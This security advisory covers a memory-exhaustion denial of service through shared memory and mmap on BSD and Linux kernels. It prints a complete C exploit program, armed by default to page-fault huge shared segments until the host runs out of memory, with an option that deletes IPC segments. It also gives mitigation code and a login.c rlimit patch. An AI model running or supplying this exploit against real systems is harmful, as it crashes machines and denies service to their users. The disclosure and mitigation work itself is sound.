COMMAND

    Shared memory (IPC)

SYSTEMS AFFECTED

    Most BSD kernels

PROBLEM

    Mike Perry posted the following.  While fiddling with various IPC
    mechanisms and reading The Design and Implementation of 4.4BSD, a
    few things may strike the reader as potentially dangerous.
    According to the book, when you request a shared memory segment
    via mmap(), the file isn't actually physically in memory until you
    start to trigger page faults and cause the vnode pager to page in
    the data from the file.  Then the following passage from shmctl(2)
    under Linux caught my eye:  "The user must ensure that a segment is
    eventually destroyed; otherwise its pages that were faulted in
    will remain in memory or swap."
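    The demand paging described above can be observed directly.  The
    sketch below is an illustration only, not part of Mike's program;
    it assumes a POSIX system with getrusage(2) and MAP_ANONYMOUS
    (Linux, modern BSDs), and faults_from_touching() is a hypothetical
    name.  It maps a small anonymous region (instead of a file behind
    the vnode pager) and counts the minor page faults raised while each
    page is written for the first time:

```c
#define _DEFAULT_SOURCE  /* exposes MAP_ANONYMOUS under strict -std= modes */
#include <stddef.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <unistd.h>

/* Minor (no disk I/O) page faults taken so far by this process, or -1. */
static long minor_faults(void)
{
    struct rusage ru;
    if (getrusage(RUSAGE_SELF, &ru) != 0)
        return -1;
    return ru.ru_minflt;
}

/*
 * Map `pages` pages of anonymous private memory, write one byte into each
 * page, and return how many minor faults that loop caused (-1 on error).
 * The mmap() call itself does not allocate physical pages; each page is
 * populated by the fault raised on its first write.
 */
long faults_from_touching(size_t pages)
{
    size_t psz = (size_t)sysconf(_SC_PAGESIZE);
    size_t len = pages * psz;
    void *map = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map == MAP_FAILED)
        return -1;

    volatile char *p = map;       /* volatile: keep every store */
    long before = minor_faults();
    for (size_t off = 0; off < len; off += psz)
        p[off] = 1;               /* first write to a page faults it in */
    long after = minor_faults();

    munmap(map, len);
    return (before < 0 || after < 0) ? -1 : after - before;
}
```

    On a typical Linux system you would expect roughly one fault per
    page touched, although the exact count can vary with the kernel's
    page allocation policy.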

    As it turns out, it is in fact possible to create a DoS condition
    by requesting a truckload of shared memory, then triggering page
    faults in the entire shared region.  The end result is no
    different than a simple fork or malloc bomb, but it is
    considerably harder to prevent on most systems.  This is mainly
    because:

        1. The system does not check rlimits for mmap() and shmget().
           (FreeBSD)
        2. The system never bothers to offer the ability to set the
           rlimits for virtual memory via shells, the login process, or
           otherwise.  (Linux)
        3. a. The system does not actually allocate shared memory
              until a page fault is triggered (this could be argued to
              be a feature).  (Linux, *BSD)
           b. The system does not watch to make sure you don't share
              more memory than exists.  (Linux, Irix, BSD?)
        4. With System V IPC, shared memory persists even after the
           process is gone.  So even though the kernel may kill the
           process after it exhausts all memory from page faults,
           there is still 0 memory left for the system.  (I suppose
           with some trickery you might be able to achieve the same
           results by shared mmap()'ing a few large files between
           pairs of processes.)  (All)
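    Item 4 is the one a well-behaved program can guard against: a
    System V segment that has been marked with IPC_RMID is destroyed by
    the kernel once the last process detaches from it, including when
    the process exits.  Mike's program below does this when
    __REALLY_FUXX0R__ is undefined.  A minimal sketch of the same
    pattern, assuming a POSIX system with System V shared memory
    (shm_alloc_autoremove() is a hypothetical name):

```c
#include <stddef.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>

/*
 * Create a private System V segment, attach it, and immediately mark it
 * for removal. The segment stays usable while attached and is destroyed
 * when the last attachment goes away (shmdt() or process exit), so it
 * cannot linger the way an un-removed segment does. Returns the attached
 * address, or NULL on failure.
 */
void *shm_alloc_autoremove(size_t size)
{
    int id = shmget(IPC_PRIVATE, size, IPC_CREAT | 0600);
    if (id == -1)
        return NULL;

    void *addr = shmat(id, NULL, 0);

    /* Mark for destruction whether or not shmat() succeeded; if it failed,
     * there are no attachments and the segment is removed right away. */
    shmctl(id, IPC_RMID, NULL);

    return addr == (void *)-1 ? NULL : addr;
}
```

    This does nothing to stop a hostile user, who simply skips the
    IPC_RMID step; it only shows what "ensuring the segment is
    eventually destroyed" means in practice.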

    Mike attached a program that will exploit these conditions using
    either shmget(), mmap(), or by getting malloc to call mmap() (in
    order of effectiveness).  This program should compile on any
    architecture.  SGI Irix is not vulnerable.  Reading The Design
    and Implementation of 4.4BSD, it sounds as if the BSDs should all
    be vulnerable.  FreeBSD will mmap as much memory as you tell it.
    The default attack is __FUXX0R_MMAP__.  Mike posted the wrong
    file: he meant to post one that had __FUXX0R_SYSV__ as the
    default attack and __REALLY_FUXX0R__ undefined (so the program
    wouldn't actually page fault and kill your system if you just
    wanted to see whether limits would kick in).  Please change these
    before running the exploit.  System V IPC is where the real
    kernel crusher is.

    It seems that OpenBSD 2.5-current (Jul 3) is vulnerable.  The
    place to check whether you're vulnerable is sys/resource.h (look
    for an address space limit such as RLIMIT_AS or RLIMIT_VMEM); or,
    if you're running BSD and have the kernel source, checking
    sys/vm/vm_mmap.c for any RLIMIT other than RLIMIT_STACK should let
    you know.  The proper way to fix this is to have a separate limit
    for address space or virtual memory.  Solaris has both (probably
    since its malloc uses both brk and mmap, and the virtual memory
    limit is for stopping malloc bombs).
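    The header check above amounts to asking whether a separate
    address space limit exists and what it is set to.  A sketch,
    assuming POSIX getrlimit(2): it uses RLIMIT_AS where defined and
    falls back to RLIMIT_VMEM (the Irix name), mirroring the #if in
    the login patch in the SOLUTION section.  address_space_limit()
    and print_address_space_limit() are hypothetical names:

```c
#include <stdio.h>
#include <sys/resource.h>

/* Pick whichever address-space limit this platform defines, if any. */
#if defined(RLIMIT_AS)
# define ADDR_SPACE_LIMIT RLIMIT_AS
#elif defined(RLIMIT_VMEM)
# define ADDR_SPACE_LIMIT RLIMIT_VMEM
#endif

/*
 * Fetch the soft address-space limit. Returns 1 and fills *cur if the
 * platform has such a limit, 0 if it has none, -1 if getrlimit() failed.
 */
int address_space_limit(rlim_t *cur)
{
#ifdef ADDR_SPACE_LIMIT
    struct rlimit rl;
    if (getrlimit(ADDR_SPACE_LIMIT, &rl) != 0)
        return -1;
    *cur = rl.rlim_cur;
    return 1;
#else
    (void)cur;
    return 0;   /* no separate address-space rlimit on this platform */
#endif
}

void print_address_space_limit(void)
{
    rlim_t cur;
    switch (address_space_limit(&cur)) {
    case 1:
        if (cur == RLIM_INFINITY)
            printf("address-space limit: unlimited\n");
        else
            printf("address-space limit: %llu bytes\n",
                   (unsigned long long)cur);
        break;
    case 0:
        printf("no address-space rlimit on this platform\n");
        break;
    default:
        perror("getrlimit");
    }
}
```

    Such a limit only bounds how much a single process can map; it does
    not stop System V segments from outliving the process that
    created them.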

    /*
     * This program can be used to exploit DoS bugs in the VM systems or utility
     * sets of certain OS's.
     *
     * Common problems:
     * 1. The system does not check rlimits for mmap and shmget (FreeBSD)
     * 2. The system never bothers to offer the ability to set the rlimits for
     *    virtual memory via shells, login process, or otherwise. (Linux)
     * 3. a. The system does not actually allocate shared memory until a page fault
     *       is triggered (this could be argued to be a feature - Linux, *BSD)
     *    b. The system does not watch to make sure you don't share more memory
     *       than exists. (Linux, Irix, BSD?)
     * 4. With System V IPC, shared memory persists even after the process is
     *    gone. So even though the kernel may kill the process after it exhausts all
     *    memory from page faults, there still is 0 memory left for the system.
     *    (All)
     *
     * This program should compile on any architecture. SGI Irix is not
     * vulnerable. From reading The Design and Implementation of 4.4BSD it sounds
     * as if the BSDs should all be vulnerable. FreeBSD will mmap as much memory
     * as you tell it. I haven't tried page faulting the memory, as the system is
     * not mine. I'd be very interested to hear about OpenBSD...
     *
     * This program is provided for vulnerability evaluation ONLY. DoS's aren't
     * cool, funny, or anything else. Don't use this on a machine that isn't
     * yours!!!
     */
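    #define _GNU_SOURCE  /* SHM_INFO, SHM_STAT and struct shm_info on glibc */
    #include <sys/types.h>
    #include <stdio.h>
    #include <stdlib.h>  /* malloc, free, exit, strtol */
    #include <string.h>  /* strcmp */
    #include <unistd.h>  /* close */
    #include <fcntl.h>   /* open, O_RDWR */
    #include <errno.h>
    #include <sys/ipc.h>
    #include <sys/shm.h> /* redefinition of LBA.. PAGE_SIZE in both cases.. */
    #ifdef __linux__
    #include <asm/shmparam.h>
    #include <asm/page.h>
    #endif
    #include <sys/stat.h>
    #include <sys/mman.h>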

    int len;

    #define __FUXX0R_MMAP__

    /* mmap also implements the copy-on-fault mechanism, but because the only way
     * to easily exploit this is to use anonymous mappings, once the kernel kills
     * the offending process, you can recover. (Although swap death may still
     * occur.) */
    /* #define __FUXX0R_MMAP__ */

    /* Most mallocs use mmap to allocate large regions of memory. */
    /* #define __FUXX0R_MMAP_MALLOC__ */


    /* Guess what this option does :) */
    #define __REALLY_FUXX0R__

    /* From glibc 2.1.1 malloc/malloc.c */
    #define DEFAULT_MMAP_THRESHOLD (128 * 1024)

    #ifndef PAGE_SIZE
    # define PAGE_SIZE 4096
    #endif

    #ifndef SHMSEG
    # define SHMSEG 256
    #endif

    #if defined(__FUXX0R_MMAP_MALLOC__)
    void *mymalloc(int n)
    {
        if(n <= DEFAULT_MMAP_THRESHOLD)
	    n = DEFAULT_MMAP_THRESHOLD + 1;
        return malloc(n);
    }

    void myfree(void *buf)
    {
        free(buf);
    }
    #elif defined(__FUXX0R_MMAP__)
    void *mymalloc(int n)
    {
        int fd;
        void *ret;
        fd = open("/dev/zero", O_RDWR);
        ret = mmap(0, n, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
        close(fd);
        return (ret == (void *)-1 ? NULL : ret);
    }
    void myfree(void *buf)
    {
        munmap(buf, len);
    }

    #elif defined(__FUXX0R_SYSV__)
    void *mymalloc(int n)
    {
        char *buf;
        static int i = 0;
        int shmid;
        i++; /* 0 is IPC_PRIVATE */
        if((shmid = shmget(i, n, IPC_CREAT | SHM_R | SHM_W)) == -1)
        {
    #if defined(__irix__)
    	    if (shmctl (shmid, IPC_RMID, NULL))
	    {
	        perror("shmctl");
	    }
    #endif

	    return NULL;
        }
        if((buf = shmat(shmid, 0, 0)) == (char *)-1)
        {
    #if defined(__irix__)
    	    if (shmctl (shmid, IPC_RMID, NULL))
	    {
	        perror("shmctl");
	    }
    #endif
	    return NULL;
        }

    #ifndef __REALLY_FUXX0R__
        if (shmctl (shmid, IPC_RMID, NULL))
        {
	    perror("shmctl");
        }
    #endif

        return buf;
    }

    void myfree(void *buf)
    {
        shmdt(buf);
    }
    #endif

    #ifdef __linux__
    void cleanSysV()
    {
        struct shmid_ds shmid;
        struct shm_info shm_info;
        int id;
        int maxid;
        int ret;
        int shid;
        maxid = shmctl (0, SHM_INFO, (struct shmid_ds *) &shm_info);
        printf("maxid %d\n", maxid);
        for (id = 0; id <= maxid; id++)
        {
	    if((shid = shmctl (id, SHM_STAT, &shmid)) < 0)
	        continue;

	    if (shmctl (shid, IPC_RMID, NULL))
	    {
	        perror("shmctl");
	    }
	    printf("id %d has %lu attachments\n", shid, (unsigned long)shmid.shm_nattch);
	    shmid.shm_nattch = 0;
	    shmctl(shid, IPC_SET, &shmid);
	    if(shmctl(shid, SHM_STAT, &shmid) < 0)
	    {
	        printf("id %d deleted successfully\n", shid);
	    }
	    else if(shmid.shm_nattch == 0)
	    {
	        printf("Still able to stat id %d, but has no attachments\n", shid);
	    }
	    else
	    {
	        printf("Error, failed to remove id %d!\n", shid);
	    }

        }
    }
    #endif

    int main(int argc, char **argv)
    {
        int shmid;
        int i = 0;
        char *buf[SHMSEG * 2];
        int max;
        int offset;
        if(argc < 2)
        {
	    printf("Usage: %s <[0x]size of segments>\n", argv[0]);
    #ifdef __linux__
	    printf("    or %s --clean (destroys all of IPC space you have permissions to)\n", argv[0]);
    #endif
	    exit(0);
        }

    #ifdef __linux__
        if(!strcmp(argv[1], "--clean"))
        {
	    cleanSysV();
	    exit(0);
        }
    #endif

        len = strtol(argv[1], NULL, 0);
        for(buf[i] = mymalloc(len); i < SHMSEG * 2 && buf[i] != NULL; buf[++i] = mymalloc(len))
	    ;

        max = i;
        perror("Stopped because");
        printf("Maxed out at %d %d byte segments\n", max, len);
    #if defined(__FUXX0R_SYSV__) && defined(SHMMNI)
        printf("Despite an alleged max of %d (%d per proc) %lu byte segs. (Page "
	        "size: %lu), \n", (int)SHMMNI, (int)SHMSEG, (unsigned long)SHMMAX,
	        (unsigned long)PAGE_SIZE);
    #endif

    #ifdef __REALLY_FUXX0R__
        fprintf(stderr, "Page faulting alloced region... Have a nice life!\n");
        for(i = 0; i < max; i++)
        {
	    for(offset = 0; offset < len; offset += PAGE_SIZE)
	    {
	        buf[i][offset] = '*';
	    }
	    printf("wrote to %d bytes of memory, final offset %d\n", len, offset);
        }
        // never reached :(
    #else
        for(i = 0; i < max; i++) /* buf[max] is not a valid allocation */
        {
	    myfree(buf[i]);
        }
    #endif
        exit(42);
    }

    If you used small segment sizes and the program segfaulted, that is
    because the default attack is mmap, and you can create an unlimited
    number of private mappings.  The program uses an array of pointers
    to keep track of the memory so it can free it when the
    __REALLY_FUXX0R__ option isn't set, so with mmap you overrun your
    own buffer.  The buffer size is twice the per-process limit on
    SysV IPC shared segments (SHMSEG), so the buffer will not be
    overrun with that attack.

SOLUTION

    Below is a patch to util-linux-2.9o login.c (and pathnames.h) that
    provides a means under Linux (it should be fairly portable to other
    OSes) to set the address space limit (RLIMIT_AS: the rlimit that
    controls how much data you can actually map into your process).
    The patch is based on an old program called lshell that set limits
    by wrapping your shell.  Sample /etc/limits file:

        # Limit the user guest to 5 minutes CPU time, 8 procs, 5 megs of
        # address space and 2 megs of data.
        guest C5P8V5D2
        # 60 minutes CPU time, 30 procs, 15 megs data, 50 megs total
        # address space, 5 megs stack, 15 megs of RSS.
        default C60P30D15V50S5R15

    At the very least, it is recommended to set "default V<size of
    physical memory>".  Lowercase letters select the next smaller unit
    (seconds instead of minutes for c, kilobytes instead of megabytes
    for v, s, r, l and d); the comment in the patch explains this in
    further detail.  Note that even in this case, a determined user
    can probably just log in a dozen or so times and use SysV IPC to
    steal the system memory.
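    The entry format can be summarized in code.  The sketch below is
    not the patch's process() function: it is a hypothetical
    parse_limit_spec() that only decodes an entry into a struct
    (applying each value would be a setrlimit() call with rlim_cur and
    rlim_max both set, as the patch does).  It assumes the letter
    meanings from the patch's comment and, unlike the patch, rejects
    unknown letters:

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>

/* Hypothetical holder for the values an /etc/limits entry sets; 0 = unset. */
struct limit_spec {
    rlim_t nofile, nproc, cpu_secs;
    rlim_t as_bytes, stack_bytes, rss_bytes, memlock_bytes, data_bytes;
};

/*
 * Parse an entry such as "C60P30D15V50S5R15". F and P are plain counts,
 * C is minutes and c seconds of CPU; for V/S/R/L/D an uppercase letter
 * means megabytes and a lowercase one kilobytes.
 * Returns 0 on success, -1 on an unknown letter.
 */
int parse_limit_spec(const char *s, struct limit_spec *out)
{
    memset(out, 0, sizeof *out);
    while (*s) {
        char c = *s++;
        char *end;
        rlim_t n = (rlim_t)strtoul(s, &end, 10);
        s = end;                               /* skip past the digits */
        rlim_t mem = isupper((unsigned char)c) ? n * 1024 * 1024 : n * 1024;

        switch (c) {
        case 'F': case 'f': out->nofile = n; break;
        case 'P': case 'p': out->nproc = n; break;
        case 'C':           out->cpu_secs = n * 60; break;
        case 'c':           out->cpu_secs = n; break;
        case 'V': case 'v': out->as_bytes = mem; break;
        case 'S': case 's': out->stack_bytes = mem; break;
        case 'R': case 'r': out->rss_bytes = mem; break;
        case 'L': case 'l': out->memlock_bytes = mem; break;
        case 'D': case 'd': out->data_bytes = mem; break;
        default:            return -1;
        }
    }
    return 0;
}
```

    Using rlim_t rather than the patch's int keeps values such as V2048
    (2 GB) from overflowing, since 2048 * 1024 * 1024 does not fit in a
    32-bit int.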

    diff -ur ./util-linux-2.9o/lib/pathnames.h ./util-linux-2.9o-mp/lib/pathnames.h
    --- ./util-linux-2.9o/lib/pathnames.h	Sun Oct 11 14:19:16 1998
    +++ ./util-linux-2.9o-mp/lib/pathnames.h	Wed Jul 14 22:51:13 1999
    @@ -86,6 +86,7 @@

     #define _PATH_SECURE		"/etc/securesingle"
     #define _PATH_USERTTY           "/etc/usertty"
    +#define _PATH_LIMITS		"/etc/limits"

     #define _PATH_MTAB		"/etc/mtab"
     #define _PATH_UMOUNT		"/bin/umount"
    diff -ur ./util-linux-2.9o/login-utils/login.c ./util-linux-2.9o-mp/login-utils/login.c
    --- ./util-linux-2.9o/login-utils/login.c	Sat Mar 20 14:20:16 1999
    +++ ./util-linux-2.9o-mp/login-utils/login.c	Wed Jul 14 22:49:24 1999
    @@ -185,6 +185,7 @@
     char *stypeof P_((char *ttyid));
     void checktty P_((char *user, char *tty, struct passwd *pwd));
     void sleepexit P_((int eval));
    +void setup_limits P_((struct passwd *pwd));
     #ifdef CRYPTOCARD
     int cryptocard P_((void));
     #endif
    @@ -1110,6 +1111,8 @@

         childArgv[childArgc++] = NULL;

    +    setup_limits(pwd);
    +
         execvp(childArgv[0], childArgv + 1);

         if (!strcmp(childArgv[0], "/bin/sh"))
    @@ -1120,6 +1123,161 @@

         exit(0);
     }
    +
    +/* Most of this code ripped from lshell by Joel Katz */
    +void process(char *buf)
    +{
    +    /* buf is of the form [Fn][Pn][Ct][Vm][Sm][Rm][Lm][Dm] where */
    +    /* F specifies n max open files */
    +    /* P specifies n max procs */
    +    /* c specifies t seconds of cpu */
    +    /* C specifies t minutes of cpu */
    +    /* v specifies m kbs of total virtual memory (address space) */
    +    /* V specifies m megs of total virtual memory (address space) */
    +    /* s specifies m kbs of stack */
    +    /* S specifies m megs of stack */
    +    /* r specifies m kbs of RSS */
    +    /* R specifies m megs of RSS */
    +    /* l specifies m kbs of locked (non-swappable) memory */
    +    /* L specifies m megs of locked (non-swappable) memory */
    +    /* d specifies m kbs of Data segment */
    +    /* D specifies m megs of Data segment */
    +
    +    struct rlimit rlim;
    +    char *pp = buf;
    +    int i;
    +
    +    while(*pp!=0)
    +    {
    +	i = 1;
    +	switch(*pp++)
    +	{
    +	    case 'f':
    +	    case 'F':
    +		i = atoi(pp);
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +		setrlimit(RLIMIT_NOFILE, &rlim);
    +		break;
    +	    case 'p':
    +	    case 'P':
    +		i = atoi(pp);
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +		setrlimit(RLIMIT_NPROC, &rlim);
    +		break;
    +	    case 'C':
    +		i = 60;
    +	    case 'c':
    +		i *= atoi(pp);
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +		setrlimit(RLIMIT_CPU, &rlim);
    +		break;
    +	    case 'V':
    +		i = 1024;
    +	    case 'v':
    +		i *= atoi(pp)*1024;
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +#if defined(RLIMIT_AS) /* Linux */
    +		setrlimit(RLIMIT_AS, &rlim);
    +#elif defined(RLIMIT_VMEM) /* Irix */
    +		setrlimit(RLIMIT_VMEM, &rlim);
    +#endif
    +		break;
    +	    case 'S':
    +		i = 1024;
    +	    case 's':
    +		i *= atoi(pp)*1024;
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +		setrlimit(RLIMIT_STACK, &rlim);
    +		break;
    +	    case 'R':
    +		i = 1024;
    +	    case 'r':
    +		i *= atoi(pp)*1024;
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +		setrlimit(RLIMIT_RSS, &rlim);
    +		break;
    +	    case 'L':
    +		i = 1024;
    +	    case 'l':
    +		i *= atoi(pp)*1024;
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +		setrlimit(RLIMIT_MEMLOCK, &rlim);
    +		break;
    +	    case 'D':
    +		i = 1024;
    +	    case 'd':
    +		i *= atoi(pp)*1024;
    +		if(!i)
    +		    break;
    +		rlim.rlim_cur = i;
    +		rlim.rlim_max = i;
    +		setrlimit(RLIMIT_DATA, &rlim);
    +		break;
    +	}
    +    }
    +}
    +
    +void setup_limits(struct passwd *pw)
    +{
    +    FILE *fp;
    +    int i;
    +    char buf[200], name[20] = "", limits[64] = "";
    +    char *p;
    +
    +    if(pw->pw_uid == 0)
    +    {
    +	return;
    +    }
    +
    +    if((fp = fopen(_PATH_LIMITS,"r")) == NULL)
    +    {
    +	return;
    +    }
    +
    +    while(fgets(buf, 200, fp) != NULL)
    +    {
    +	if(buf[0] == '#')
    +	    continue;
    +
    +	p = strchr(buf, '#');
    +	if(p)
    +	    *p = 0;
    +
    +	if((i = sscanf(buf, "%19s %63s", name, limits)) < 1) continue;
    +
    +	if(!strcmp(name, pw->pw_name))
    +	{
    +	    if(i==2)
    +		process(limits);
    +	    fclose(fp);
    +	    return;
    +	}
    +    }
    +    fclose(fp);
    +    process(limits); /* Last line is default */
    +}
    +

     void
     getloginname()

    SysVinit (>2.54) uses /etc/initscript (or /sbin/initscript) to
    spawn the processes listed in /etc/inittab, so you can set limits
    within that script (e.g. for the getty processes).  Either wrap
    in.telnetd, or use its -L option to point it at a wrapper around
    the login program.  Set limits in the rc.inet2 (or similar) script
    for daemons which may execute user-defined code (e.g. crond,
    httpd).  Do the same for xdm via Xstartup.  You might also want to
    wrap your MDAs if you are using procmail or allow program aliases
    in ~/.forward files.
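    Each of these wrappers boils down to the same two steps: lower the
    limit, then exec the real program, which inherits it.  A minimal
    sketch, assuming a system with RLIMIT_AS (Linux);
    exec_with_as_limit() is a hypothetical helper, not part of
    SysVinit, telnetd or the patch above:

```c
#include <stdio.h>
#include <sys/resource.h>
#include <unistd.h>

/*
 * Set both the soft and hard address-space limit to `bytes`, then replace
 * the current process image with argv[0] (searched in PATH if it has no
 * slash). The new program inherits the limit. Returns -1 only on failure.
 */
int exec_with_as_limit(rlim_t bytes, char *const argv[])
{
    struct rlimit rl;
    rl.rlim_cur = bytes;
    rl.rlim_max = bytes;

    if (setrlimit(RLIMIT_AS, &rl) != 0) {
        perror("setrlimit(RLIMIT_AS)");
        return -1;
    }
    execvp(argv[0], argv);
    perror("execvp");   /* reached only if the exec failed */
    return -1;
}
```

    A wrapper's main() might call exec_with_as_limit() with a byte
    count parsed from its first argument and argv + 2 as the command to
    run.  Setting the hard limit as well as the soft one matters: an
    unprivileged child cannot raise a hard limit again.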


    To set these limits you have to use PAM, SysV init, or a patch
    such as the one above.  Lshell does not set the RLIMIT_AS limit
    either; you have to patch it as well.  After more research, it
    seems that System V implements RLIMIT_VMEM to stop people from
    exploiting this problem, but apparently when BSD implemented
    System V IPC, they neglected to add an appropriate RLIMIT.